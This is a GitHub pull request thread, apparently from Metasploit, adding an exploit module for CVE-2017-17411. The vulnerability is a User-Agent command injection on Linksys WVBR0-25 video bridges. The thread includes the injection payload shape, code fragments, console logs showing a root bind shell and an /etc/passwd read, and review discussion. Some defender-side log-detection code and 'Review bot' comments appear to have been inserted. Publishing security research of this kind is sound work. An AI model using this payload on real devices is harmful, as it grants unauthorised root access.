Adds exploit module for CVE-2017-17411 #9336

Merged: 7 commits, Jan 4, 2018

Conversation

headlesszeke (Contributor, author):

This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
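Two defender-side checks derived from this thread, written as an added example (not code from the PR or from the Metasploit module): parsing the firmware banner in the format @nixawk's test page uses later in the thread and comparing it against 1.0.41 with Gem::Version, and flagging access-log User-Agent values that carry the `";… #` injection shape. The Apache combined-log format and all sample lines are assumptions I constructed.

```ruby
# Added example (not the PR's or the module's code): two defender-side checks
# built on facts from this thread. Banner format follows @nixawk's test page;
# the access-log format (Apache combined) and the log lines are constructed.
require 'rubygems'

# First firmware with the fix, per the module description (vulnerable: < 1.0.41).
FIXED_VERSION = Gem::Version.new('1.0.41')

# Extract the firmware version from the device's root-page banner. Returns nil
# unless the page names the model, so an arbitrary web page never "matches".
def banner_version(body)
  return nil unless body.include?('ModelName:WVBR0-25')
  m = body.match(/Firmware Version:\s*(\d+(?:\.\d+)+)/)
  m && Gem::Version.new(m[1])
end

# True only when the banner parses and is older than 1.0.41. Gem::Version
# compares segment by segment (1.0.4 < 1.0.35 < 1.0.41 < 1.0.100), which avoids
# the hand-written digit-range regex used for the same test in the module.
def vulnerable_version?(body)
  v = banner_version(body)
  !v.nil? && v < FIXED_VERSION
end

# Access-log triage: a User-Agent that closes a quoted string and then starts a
# shell command (; | & or a backtick), ends with a "#" comment, or contains $(
# is not a browser. "Mozilla/5.0 (X11; Linux)" passes: its ";" follows no quote.
SUSPICIOUS_UA = /"\s*[;|&`]|\s#\s*\z|\$\(/

def suspicious_user_agent?(ua)
  ua.match?(SUSPICIOUS_UA)
end

# Constructed combined-format log; Apache writes quotes inside the UA as \".
SAMPLE_LOG = <<~'LOG'
  10.0.0.109 - - [21/Dec/2017:17:09:54 -0600] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
  10.0.0.109 - - [21/Dec/2017:17:09:55 -0600] "GET / HTTP/1.1" 200 512 "-" "\"; printf \"e3b0c442 #"
LOG

# Parse each line, unescape the UA field and flag it; one hash per parsed line.
def scan_access_log(log)
  log.each_line.map do |line|
    m = line.match(/\A(\S+) .*? "([^"]*)" "((?:[^"\\]|\\.)*)"\s*\z/)
    next unless m
    ua = m[3].gsub('\\"', '"')
    { ip: m[1], referer: m[2], user_agent: ua, suspicious: suspicious_user_agent?(ua) }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  banner = 'Vendor:LINKSYS ModelName:WVBR0-25-US Firmware Version: 1.0.35.163016 Firmware Builddate: 2014-08-26 18:05'
  puts "banner reports vulnerable firmware: #{vulnerable_version?(banner)}"
  scan_access_log(SAMPLE_LOG).each { |r| puts "#{r[:ip]} suspicious=#{r[:suspicious]} ua=#{r[:user_agent]}" }
end
```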

'method' => 'GET',
'uri' => '/'
})
if res && res.code == 200 && res.body.to_s =~ /Firmware Version: (1\.0\.(40|[1-3][0-9]|[0-9])\.|0\.)/ # version < 1.0.41
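Review bot: the version gate on the last line hand-encodes the range 1.0.0 to 1.0.40 as a digit-class alternation, which is hard to read and easy to get wrong when the fixed version changes; capture the version with something like `/Firmware Version: (\d+(?:\.\d+)+)/` and compare `Gem::Version.new(captured) < Gem::Version.new('1.0.41')` instead, so the threshold is a single literal.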
nixawk (Contributor), Dec 22, 2017:

False positives can be here. Let's set up a simple HTTP server for it:

```
$ cat index.html
Vendor:LINKSYS ModelName:WVBR0-25-US Firmware Version: 1.0.35.163016 Firmware Builddate: 2014-08-26 18:05 Product.type: production Linux: Linux version 2.6.30 (root@build-vm) (gcc version 4.2.1 (ARC_2.3)) #1 Tue Aug 26 10:47:37 PDT 2014 Board: titans
$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
```

Try to check the vulnerability status as follows:

```
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show options

Module options (exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RPORT 8080
RPORT => 8080
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > check
[+] 127.0.0.1:8080 The target is vulnerable.
```

headlesszeke (author):

Hmm...that is true, but then again I can't think of a way to check this that can't also be faked in the same way...

Contributor:

I think @nixawk is suggesting a more unique string to fingerprint?

Contributor:

Also, it should return CheckCode::Appears if it's just a version check.

headlesszeke (author):

Oh that’s an idea. If I have it echo back a random string at runtime, then it wouldn’t be possible to predict the response. I’ll do that instead.

Contributor:

Yeah, that's the kind of check that would warrant CheckCode::Vulnerable. You even do it below with cmd/unix/generic. :)

return Exploit::CheckCode::Unknown
end

puts res.body.to_s
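Review bot: if this `CheckCode::Unknown` is the fall-through for every response that fails the version regex, it conflates a host that returned no banner with a device whose banner parses but reports 1.0.41 or later; the second case is `CheckCode::Safe`, and keeping `Unknown` for the first makes `check` output meaningful. The `puts res.body.to_s` after the `end` also writes the raw body to stdout outside the framework's print layer and should go.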
nixawk (Contributor), Dec 22, 2017:

- `puts` is not recommended; `vprint_*` / `print_*` can be used.
- If the status is vulnerable, we should not output the HTTP response directly in the check function.

headlesszeke (author):

Gah! This was a debug message from my testing. Will remove it.

# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
Contributor:

Please remove `require 'msf/core'`.

headlesszeke (author):

Oh ok, removing.

[
['CVE', '2017-17411'],
['ZDI', '17-973'],
['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair']
Contributor:

This was a good read. Didn't realize it was you, @headlesszeke!

##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
Contributor:

Command injection that might be ExcellentRanking.

headlesszeke (author):

heh, well if you say so ;)

'method' => 'GET',
'uri' => '/',
'headers' => {
'User-Agent' => "\"; printf \"#{check_str}"
Contributor:

You can use the top-level key `agent` instead of setting it in `headers` manually.

headlesszeke (author):

will do

res = send_request_raw({
'method' => 'GET',
'uri' => '/',
'agent' => "\"; printf \"#{check_str}"
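Review bot: `printf` treats its first argument as a format string, so `check_str` must never contain `%` or a backslash, and since it is interpolated into the command line without quoting it must not contain shell metacharacters either; generating it with an alphanumeric-only helper such as `Rex::Text.rand_text_alphanumeric` satisfies both constraints, and a short comment at this line saying so would keep a future edit from breaking the check.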
nixawk (Contributor), Dec 22, 2017:

`echo <"string">` == `printf <"string\n">`.

- `echo` may be more stable.

headlesszeke (author):

I thought printf was the more reliable of the two. I used it so I wouldn’t have to deal with any newlines being fed to the md5sum along with the string, but I can change it if desired.

Contributor:

Since this is a device and not Joe Bob's random PHP app, and you have the device, you can check. It's probably BusyBox. If it has both, use either.

headlesszeke (author):

Oh yeah, it definitely has both. I think I’m just gonna leave it as is for simplicity.

wvu (Contributor) commented Dec 27, 2017:

I'm happy to handle this instead of just shepherding it if @headlesszeke is willing to test. :)

If you could add some quick docs as per https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation, that'd be fantastic. You can find examples under documentation/**/*.md. Thanks!

wvu self-assigned this Dec 27, 2017
headlesszeke (author):

Sorry for the delay over the holiday, doc file added (hopefully up to the usual standards)

@@ -0,0 +1,49 @@
## Vulnerable Application

This module exploits a command injection vulnerability in the [Linksys WVBR0-25](https://www.att.com/help/manuals/directv/dvrs.html) wireless video bridge. A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/).
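Review bot: the opening paragraph links to the advisory but never states the affected firmware range (versions before 1.0.41, per the module description) or that no authentication is required; add both here so a reader can tell from the docs alone which devices the module applies to.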
Contributor:

The link doesn't link to anything specifically, and I don't see Linksys or WVBR0-25 on the page. Can we find a better link?

headlesszeke (author):

Yeah, I kinda figured this question would come up. That page has a link to the wvbr0's manual under the wireless video bridge section and is the closest thing to a vendor product page I can find. I didn't link directly to the manual itself because it seemed in poor form to link to a pdf from metasploit. ;)

As I see it, there are two other options if we don't want that: I can either link to a 3rd party site that has a better description for the device but is not official (like https://www.solidsignal.com/pview.asp?p=wvb for example) or remove the link altogether...

Contributor:

The page is fine, I think, if you were to say something like "(under the title foobar)" directing to where it was. I think adding an "unofficial" link is also a stellar idea. This way, since either may change, we have at least a base reference to go off of.

2. Start msfconsole.
3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth```
4. Do: ```set payload cmd/unix/bind_netcat```
5. Do: ```set RHOST <ip>```
Contributor:

Change to square brackets.

headlesszeke (author):

Will do.

h00die (Contributor) commented Jan 2, 2018:

Docs look pretty good, 2 minor nitpicks, but overall nice.

wvu (Contributor) commented Jan 3, 2018:

Can you do one last test, @headlesszeke? I'll ship it after.

headlesszeke (author):

Just tested the module again for fun after making the doc changes. Everything still working beautifully. Thanks for the help!

wvu added a commit to wvu/metasploit-framework that referenced this pull request Jan 4, 2018
wvu merged commit 589de04 into rapid7:master Jan 4, 2018
pbarry-r7 (Contributor):

Release Notes

This new exploit module can achieve RCE on Linksys WVBR0-25 (wireless video bridge) devices running certain versions of firmware.
